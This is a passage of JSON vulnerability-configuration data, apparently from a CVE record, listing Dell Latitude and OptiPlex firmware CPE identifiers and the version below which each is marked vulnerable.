"cpe:2.3:h:dell:latitude_7290:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7300_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7300:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7310_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7310:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7320_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.34.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7320:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7320_detachable_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7320_detachable:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7330_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7330:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7330_rugged_laptop_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.25.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7330_rugged_laptop:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7340_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7340:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7380_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.36.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7380:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7390_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.37.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7390:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7390_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.34.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7390_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7400_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7400:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7400_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7400_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7410_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7410:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7414_rugged_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.45.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7414_rugged:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.34.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7424_rugged_extreme_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.31.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7424_rugged_extreme:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7480_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.36.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7480:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7490_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.37.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7490:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.34.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7530_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7530:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_7640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_7640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_9330_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.18.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_9330:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_9410_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_9410:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_9420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_9420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_9430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_9430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_9440_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_9440_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_9510_2in1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_9510_2in1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_9520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_9520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_rugged_7220ex_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.35.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_rugged_7220ex:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_3000_micro_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_3000_micro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_3000_small_form_factor_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_3000_small_form_factor:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_3000_tower_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_3000_tower:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_3000_thin_client_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.16.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_3000_thin_client:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_3050_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_3050:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_3050_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.31.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_3050_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_3060_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_3060:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_3070_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_3070:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_3080_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.24.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_3080:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_3090_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.18.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_3090:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_3090_ultra_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_3090_ultra:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_3280_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_3280_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_5000_micro_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_5000_micro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_5000_small_form_factor_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_5000_small_form_factor:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_5000_tower_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_5000_tower:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_5050_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_5050:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_5055_a-serial_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_5055_a-serial:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_5055_ryzen_apu_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_5055_ryzen_apu:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_5055_ryzen_cpu_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_5055_ryzen_cpu:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_5060_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_5060:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_5070_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_5070:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_5080_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.24.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_5080:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_5090_micro_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_5090_micro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_5090_small_form_factor_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_5090_small_form_factor:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_5090_tower_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_5090_tower:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : 